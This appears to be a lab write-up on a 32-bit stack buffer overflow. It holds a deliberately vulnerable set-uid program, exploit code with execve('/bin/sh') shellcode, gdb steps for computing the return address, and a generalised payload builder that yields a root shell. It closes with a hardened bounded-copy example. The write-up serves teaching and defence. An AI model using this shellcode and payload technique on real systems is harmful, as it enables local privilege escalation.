Initial settings

In Ubuntu and other Linux systems, address space layout randomization (ASLR) randomizes the starting addresses of the heap and stack each time a program runs. A stack-based buffer overflow depends on guessing the exact address where the injected code will sit, so randomization makes the attack much harder; for this experiment it is switched off.

In addition, to blunt buffer overflow attacks and other attacks that end in a shell, many shell programs drop their privileges automatically when invoked: if the effective uid differs from the real uid, the shell resets the effective uid to the real one. So even if you can trick a set-uid program into calling such a shell, you cannot keep root permission in the shell. This protective measure is implemented in /bin/bash, so the shell the shellcode launches must not be one that drops privileges.

Enter the command that switches the shell into a 32-bit Linux environment, since the vulnerable program and the shellcode below are 32-bit (i386).
Vulnerability program
stack.c
```c
/* stack.c */
/* This program has a buffer overflow vulnerability. */
/* Our task is to exploit this vulnerability */
#include <stdlib.h>
#include <stdio.h>
#include <string.h>

int bof(char *str)
{
    char buffer[12];

    /* The following statement has a buffer overflow problem:
       strcpy() copies until the first NUL byte and knows nothing about
       the 12-byte size of buffer, so a long str overwrites the saved
       frame pointer and the return address stored above it. */
    strcpy(buffer, str);

    return 1;
}

int main(int argc, char **argv)
{
    char str[517];
    FILE *badfile;

    badfile = fopen("badfile", "r");
    if (badfile == NULL) {
        perror("badfile");
        return 1;
    }
    fread(str, sizeof(char), 517, badfile);
    fclose(badfile);
    bof(str);

    printf("Returned Properly\n");
    return 1;
}
```
Compile stack.c as a 32-bit set-uid root program. For the attack below to work the compiler's stack protector must be disabled and the stack must be executable, since the return address is overwritten with an address inside the stack and the shellcode runs from there; the binary must then be owned by root with the set-uid bit set.
Attack program
```c
/* exploit.c */
/* A program that creates a file containing code for launching a shell */
#include <stdlib.h>
#include <stdio.h>
#include <string.h>

char shellcode[] =
    "\x31\xc0"      /* xorl  %eax,%eax   */
    "\x50"          /* pushl %eax        */
    "\x68""//sh"    /* pushl $0x68732f2f */
    "\x68""/bin"    /* pushl $0x6e69622f */
    "\x89\xe3"      /* movl  %esp,%ebx   */
    "\x50"          /* pushl %eax        */
    "\x53"          /* pushl %ebx        */
    "\x89\xe1"      /* movl  %esp,%ecx   */
    "\x99"          /* cdq               */
    "\xb0\x0b"      /* movb  $0x0b,%al   */
    "\xcd\x80"      /* int   $0x80       */
;

int main(int argc, char **argv)
{
    char buffer[517];
    FILE *badfile;

    /* Initialize buffer with 0x90 (NOP instruction) */
    memset(buffer, 0x90, 517);

    /* You need to fill the buffer with appropriate contents here */
    /* The four bytes after the 24 NOPs land on the saved return address
       of bof(); replace \x??\x??\x??\x?? with the shellcode address found
       in gdb, in little-endian byte order. strcpy() appends a NUL at
       offset 28, beyond the return address, so that byte is harmless. */
    strcpy(buffer, "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
                   "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
                   "\x??\x??\x??\x??");
    /* Copy the shellcode into the buffer at offset 100 */
    strcpy(buffer + 100, shellcode);

    /* Save the contents to the file "badfile" */
    badfile = fopen("./badfile", "w");
    if (badfile == NULL) {
        perror("badfile");
        return 1;
    }
    fwrite(buffer, 517, 1, badfile);
    fclose(badfile);
    return 0;
}
```
Debug the vulnerable program with gdb
Enter disass main to disassemble main.
The starting address of str can be read from esp at the point where it is passed to bof, so the breakpoint is set at address 0x080484ee and the program is run to that point.
Finally, read the address of str and compute the address of the shellcode as str + 100, because exploit.c places the shellcode at offset 100 of the buffer that becomes str.
Now modify exploit.c, replacing \x??\x??\x??\x?? with the calculated result \x14\xd0\xff\xff (the address 0xffffd014 written in little-endian byte order, as the i386 stack stores it).
Compile exploit.c and run it to generate badfile.
Attack: run the set-uid stack program, which reads badfile and overflows bof()'s buffer.
Root privileges are obtained: the shellcode runs with the effective uid of the set-uid program, so the resulting shell is root.
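As an added example (not part of the lab's own exploit.c), the payload construction above written as a reusable function: it takes the offsets and the gdb-derived address as parameters instead of hard-coding the bytes, and it checks the one failure mode that silently breaks this attack, a NUL byte in the address. Because bof() copies the file with strcpy(), the bytes up to and including the overwritten return address must contain no zero, or the copy stops before the return address is reached. The offsets 24 and 100 and the address 0xffffd014 are taken from exploit.c and the gdb session on this page and are assumptions about that machine; on another machine the address will differ.

```c
/* build_badfile.c: added example, generalising exploit.c's payload layout. */
#include <stdio.h>
#include <stdint.h>
#include <string.h>
#include <stddef.h>

#define PAYLOAD_LEN 517
#define NOP 0x90

/* Same shellcode as exploit.c: execve("/bin//sh", ["/bin//sh", NULL], NULL). */
static const unsigned char shellcode[] =
    "\x31\xc0"          /* xorl  %eax,%eax   */
    "\x50"              /* pushl %eax        */
    "\x68""//sh"        /* pushl $0x68732f2f */
    "\x68""/bin"        /* pushl $0x6e69622f */
    "\x89\xe3"          /* movl  %esp,%ebx   */
    "\x50"              /* pushl %eax        */
    "\x53"              /* pushl %ebx        */
    "\x89\xe1"          /* movl  %esp,%ecx   */
    "\x99"              /* cdq               */
    "\xb0\x0b"          /* movb  $0x0b,%al   */
    "\xcd\x80";         /* int   $0x80       */

/* Fill out[] with NOPs, write ret_addr (little-endian, i386) at ret_off and
 * the shellcode at sc_off. Returns 0 on success, -1 if the layout does not fit. */
int build_payload(unsigned char *out, size_t len, uint32_t ret_addr,
                  size_t ret_off, size_t sc_off)
{
    size_t sc_len = sizeof(shellcode) - 1;   /* drop the string terminator */
    if (ret_off + 4 > len || sc_off + sc_len > len || ret_off + 4 > sc_off)
        return -1;
    memset(out, NOP, len);
    for (int i = 0; i < 4; i++)              /* least significant byte first */
        out[ret_off + i] = (unsigned char)(ret_addr >> (8 * i));
    memcpy(out + sc_off, shellcode, sc_len);
    return 0;
}

/* bof() uses strcpy(), which stops at the first NUL byte. Everything up to
 * and including the overwritten return address must therefore be NUL-free.
 * Returns 1 if that holds, 0 if the copy would be truncated early. */
int reaches_return_address(const unsigned char *buf, size_t ret_off)
{
    for (size_t i = 0; i < ret_off + 4; i++)
        if (buf[i] == 0)
            return 0;
    return 1;
}

int main(void)
{
    unsigned char buf[PAYLOAD_LEN];
    /* Assumed: str + 100 as computed in the gdb session on this page. */
    uint32_t sc_addr = 0xffffd014u;

    if (build_payload(buf, sizeof buf, sc_addr, 24, 100) != 0 ||
        !reaches_return_address(buf, 24)) {
        fprintf(stderr, "payload construction failed (bad layout or NUL in address)\n");
        return 1;
    }
    FILE *f = fopen("badfile", "wb");
    if (f == NULL) {
        perror("badfile");
        return 1;
    }
    fwrite(buf, 1, sizeof buf, f);
    fclose(f);
    return 0;
}
```

If gdb reports an address with a zero byte (for example one ending in 0x00), the check fails and no badfile is written; the usual fix is to move the shellcode to a different offset so that the target address changes, rather than to write a payload that strcpy() will cut short.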
Practice
Experimental principle
A buffer overflow occurs when the amount of data written during program execution exceeds the space allocated for it, so that the excess overwrites the areas holding other data. An attacker who controls that data can use it to execute unauthorized instructions, obtain information or system privileges, and then carry out various illegal operations; a clumsy overflow instead causes program failure, system downtime, restarts and similar consequences. A malicious user can use this vulnerability to change the program's control flow and even execute arbitrary fragments of code. The vulnerability arises because the data buffer and the saved return address are stored close together on the stack: the overflow runs past the end of the buffer and overwrites the return address.
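As an added example (not part of the lab), the unbounded copy from stack.c next to a bounded replacement, plus a pure check that reports whether a given input would spill past a 12-byte buffer the way bof() does. The fixed version rejects input that does not fit instead of truncating silently, and it also addresses a second weakness in stack.c's main(): fread() does not guarantee a terminating NUL in str, so even a "safe" length check must not read past a known bound. BUF_SIZE and the function names are assumptions chosen to mirror stack.c.

```c
/* bof_compare.c: added example, vulnerable copy beside a hardened one. */
#include <stdio.h>
#include <string.h>

#define BUF_SIZE 12

/* Vulnerable form, as in stack.c: strcpy() does not know how big buffer is,
 * so any str of BUF_SIZE or more bytes overwrites the saved frame pointer and
 * return address that sit just above buffer on the stack. Never call this
 * with untrusted input. */
int bof_vulnerable(const char *str)
{
    char buffer[BUF_SIZE];
    strcpy(buffer, str);
    return 1;
}

/* Hardened form: look for the terminator only within the bounded input,
 * refuse anything that does not fit with its terminator, then copy a known
 * number of bytes. Returns 1 on success, 0 when the input was rejected. */
int bof_safe(const char *str, size_t str_len)
{
    char buffer[BUF_SIZE];
    size_t limit = str_len < BUF_SIZE ? str_len : BUF_SIZE;
    const char *end = memchr(str, '\0', limit);

    if (end == NULL)                 /* no terminator within what fits */
        return 0;
    size_t n = (size_t)(end - str);  /* n <= BUF_SIZE - 1 here */
    memcpy(buffer, str, n);
    buffer[n] = '\0';
    (void)buffer;
    return 1;
}

/* Pure check: would this NUL-terminated input overflow bof()'s buffer? */
int would_overflow(const char *str)
{
    return strlen(str) + 1 > BUF_SIZE;
}

int main(void)
{
    const char *ok = "0123456789A";     /* 11 bytes + NUL fits in 12 */
    const char *bad = "0123456789AB";   /* 12 bytes + NUL does not   */
    printf("%s: overflow=%d safe=%d\n", ok, would_overflow(ok), bof_safe(ok, strlen(ok) + 1));
    printf("%s: overflow=%d safe=%d\n", bad, would_overflow(bad), bof_safe(bad, strlen(bad) + 1));
    return 0;
}
```

The second parameter of bof_safe() is the real size of the caller's buffer (517 for str in stack.c); passing it lets memchr() stop at the buffer boundary even when the file contents contain no NUL at all, which is exactly the case exploit.c produces beyond offset 28.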